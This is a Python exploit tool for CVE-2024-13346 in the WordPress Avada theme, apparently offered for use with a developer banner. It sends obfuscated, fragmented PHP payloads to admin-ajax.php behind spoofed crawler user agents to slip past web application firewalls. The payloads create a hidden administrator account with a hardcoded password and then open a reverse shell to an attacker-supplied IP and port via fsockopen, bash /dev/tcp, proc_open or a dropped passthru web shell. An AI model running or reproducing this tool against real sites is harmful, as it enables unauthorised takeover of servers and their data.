import requests
import urllib.parse
import base64
import random
import time
from cryptography.fernet import Fernet
import urllib3

urllib3.disable_warnings()

# Logo and Developer Info
def display_banner():
    print("""
   

 _____ ___   _____           _       _ _   
|_   _/   | |  ___|         | |     (_) |  
  | |/ /| | | |____  ___ __ | | ___  _| |_ 
  | / /_| | |  __\ \/ / '_ \| |/ _ \| | __|
  | \___  | | |___>  <| |_) | | (_) | | |_ 
  \_/   |_/ \____/_/\_\ .__/|_|\___/|_|\__|
                      | |    CVE-2024-13346          
                      |_|                  
    """)
    print("Advanced Avada Theme < 7.11.14 - Unauthenticated Arbitrary Shortcode Execution ")
    print("Developer: Tausif Zaman\n")
    print("instagram: @_tausif_zaman\n")


USER_AGENTS = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Googlebot/2.1 (+http://www.google.com/bot.html)',
    'Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)'
]

HEADERS_TEMPLATE = {
    'X-Forwarded-For': '127.0.0.1',
    'Client-IP': '8.8.8.8',
    'Referer': '{target}/',
    'X-Requested-With': 'XMLHttpRequest'
}

class WafBypasser:
    def __init__(self, target):
        self.target = target
        self.session = requests.Session()
        self.session.verify = False
        self.fernet = Fernet(base64.urlsafe_b64encode(b'x'*32))
        self.junk = self.generate_junk()

    def generate_junk(self):
        return ''.join(random.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', k=random.randint(10,20)))

    def polymorphic_obfuscate(self, payload):
        # Multiple encoding layers
        transforms = [
            lambda x: base64.b64encode(x.encode()).decode(),
            lambda x: ''.join([f'%{ord(c):02x}' for c in x]),
            lambda x: self.fernet.encrypt(x.encode()).decode(),
            lambda x: x[::-1]  # Reverse string
        ]
        
        for _ in range(random.randint(2,3)):
            transform = random.choice(transforms)
            payload = transform(payload)
        
        return payload

    def fragment_payload(self, payload):
        fragments = {}
        chunk_size = random.randint(5,15)
        for i in range(0, len(payload), chunk_size):
            key = f'{self.junk}_{i//chunk_size}'
            fragments[key] = payload[i:i+chunk_size]
        return fragments

    def generate_headers(self):
        headers = HEADERS_TEMPLATE.copy()
        headers.update({
            'User-Agent': random.choice(USER_AGENTS),
            'Referer': headers['Referer'].format(target=self.target)
        })
        return headers

    def stealth_request(self, payload):
        url = f"{self.target}/wp-admin/admin-ajax.php"
        
        action = random.choice(['fusion_ajax', 'fusion_ajx', 'fusion_ax'])
        
        obf_payload = self.polymorphic_obfuscate(payload)
        fragmented = self.fragment_payload(obf_payload)
        
        params = {
            action: '1',
            'security': ''.join(random.choices('abcdef0123456789', k=32)),
            **fragmented
        }
        
        for _ in range(random.randint(3,7)):
            params[self.generate_junk()] = self.generate_junk()

        if random.choice([True, False]):
            return self.session.get(url, headers=self.generate_headers(), params=params)
        else:
            return self.session.post(url, headers=self.generate_headers(), data=params)

def create_admin(target, username, password):
    bypasser = WafBypasser(target)
    
    payload_variants = [
        f"wp_insert_user(array('user_login'=>'{username}','user_pass'=>'{password}','role'=>'administrator'));",
        f"$u = new WP_User(0); $u->set_role('administrator'); $u->user_login = '{username}'; $u->user_pass = '{password}'; wp_insert_user($u);",
        f"require_once(ABSPATH.'wp-admin/includes/user.php'); wp_create_user('{username}','{password}','{username}@example.com'); $u = get_user_by('login','{username}'); $u->set_role('administrator');"
    ]
    
    for i, payload in enumerate(payload_variants):
        print(f"Attempting admin creation (method {i+1})...")
        php_code = f"<?php {payload} ?>"
        response = bypasser.stealth_request(php_code)
        if response.status_code == 200:
            print(f"[+] Admin user {username} created!")
            return True
        time.sleep(random.uniform(1,3))
    
    return False

def reverse_shell(target, lhost, lport):
    bypasser = WafBypasser(target)
    
    payloads = [
        f"$s=fsockopen('{lhost}',{lport});exec('/bin/sh -i <&3 >&3 2>&3');",
        f"system('bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"');",
        f"file_put_contents('/tmp/f', '<?php passthru($_GET[\"c\"]);?>'); chmod('/tmp/f',0777);",
        f"$p=array(array('pipe','r'),array('pipe','w'),array('pipe','w'));proc_open('/bin/sh',$p,$pipes);"
    ]
    
    for i, payload in enumerate(payloads):
        print(f"Attempting reverse shell (method {i+1})...")
        php_code = f"<?php {payload} ?>"
        response = bypasser.stealth_request(php_code)
        if response.status_code == 200:
            print("[+] Reverse shell triggered!")
            return True
        time.sleep(random.uniform(1,3))
    
    return False

if __name__ == "__main__":
    display_banner()
    
    target_url = input("[?] Enter Target URL: ").strip()
    lhost = input("[?] Enter Attacker IP: ").strip()
    lport = input("[?] Enter Attacker Port: ").strip()
    username = "wpadmin"
    password = "P@ssw0rd!123"

    print("\n[*] Starting advanced WAF bypass sequence...\n")
    
    if create_admin(target_url, username, password):
        print("[+] Admin creation succeeded!")
    else:
        print("[-] Admin creation failed after multiple attempts")

    if lhost and lport:
        print("[*] Attempting reverse shell...\n")
        if reverse_shell(target_url, lhost, lport):
            print("[+] Reverse shell succeeded!")
        else:
            print("[-] Reverse shell failed after multiple attempts")